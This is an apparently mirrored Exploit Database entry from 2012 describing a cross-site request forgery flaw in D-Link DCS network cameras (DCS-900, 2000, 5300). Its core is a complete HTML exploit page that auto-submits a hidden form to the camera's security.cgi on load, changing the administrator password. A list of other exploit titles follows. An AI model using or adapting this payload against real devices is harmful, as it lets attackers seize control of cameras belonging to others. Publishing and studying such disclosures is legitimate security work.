D-Link DCS Series – Cross-Site Request Forgery (Change Admin Password)

Exploit Database
98 阅读

作者： rigan

日期： 2012-02-22
类别：
- webapps
平台：
- hardware
来源：https://www.exploit-db.com/exploits/18509/

Title: Dlink DCS series CSRF Change Admin Password 
Version: DCS-900, DCS-2000, DCS-5300 and possibly other.
Date:2012-02-22
Author:rigan - imrigan [sobachka] gmail.com
--
Description:
Dlink DCS is a series of network cameras. These cameras use a web interface which is prone to CSRF vulnerabilities. This flaw allows to change the administrator password. 
--
Exploit:
<html>
<body onload="javascript:document.forms[0].submit()">
<form method="POST" name="form0" action="http://your_target/setup/security.cgi">
<input type="hidden" name="rootpass" value="your_pass"/>
<input type="hidden" name="confirm" value="your_pass"/>
</form>
</body>
</html>
--

last Exploits
D-Link DCS Series – Cross-Site Request Forgery (Change Admin Password)的更多信息

Aero CMS v0.0.1 – PHP Code Injection (auth)：
Manx 1.0.1 – ‘/admin/admin_blocks.php?Filename’ Traversal Arbitrary File Access：
ImagePro Lazygirls Clone Script – SQL Injection：
RedaxScript CMS 2.2.0 – SQL Injection：
TinyCMS 1.3 – ‘/admin/admin.php?do’ Traversal Local File Inclusion：
bbPress 1.0.2 – Cross-Site Request Forgery (Change Admin Password)：
Apache Struts 2.3.5 < 2.3.31 / 2.5 < 2.5.10 - Remote Code Execution：
Claus Muus Spitfire 1.0.336 – Multiple Cross-Site Scripting Vulnerabilities：